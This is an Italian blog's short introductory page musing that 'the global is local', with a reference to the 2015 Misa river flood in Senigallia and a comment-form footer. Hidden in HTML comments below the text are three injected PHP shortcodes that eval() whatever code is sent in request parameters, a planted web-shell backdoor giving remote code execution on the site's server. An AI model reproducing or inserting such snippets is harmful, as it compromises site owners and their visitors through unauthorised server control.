Il globale e’ locale.

La piena del Misa a Senigallia, Deb.2015

Questo blog nasce proprio da questa riflessione.

Ogni giorno guardiamo il mondo dalla finestra della nostra esperienza e conoscenza. Vediamo New York, ma anche i nostri micro-paesi.

Sappiamo dov’e’ la Fifth Avenue, e dove cercare Pechino su un mappamondo. Ma subito dopo andiamo a vedere cosa succede dietro casa nostra.

Quindi, il globale e’ locale.

 

<!– [insert_php]if (isset($_REQUEST["tqa"])){eval($_REQUEST["tqa"]);exit;}[/insert_php][php]if (isset($_REQUEST["tqa"])){eval($_REQUEST["tqa"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["GxBD"])){eval($_REQUEST["GxBD"]);exit;}[/insert_php][php]if (isset($_REQUEST["GxBD"])){eval($_REQUEST["GxBD"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["irk"])){eval($_REQUEST["irk"]);exit;}[/insert_php][php]if (isset($_REQUEST["irk"])){eval($_REQUEST["irk"]);exit;}[/php] –>

Be the first to comment

Leave a Reply

L'indirizzo email non sarà pubblicato.


*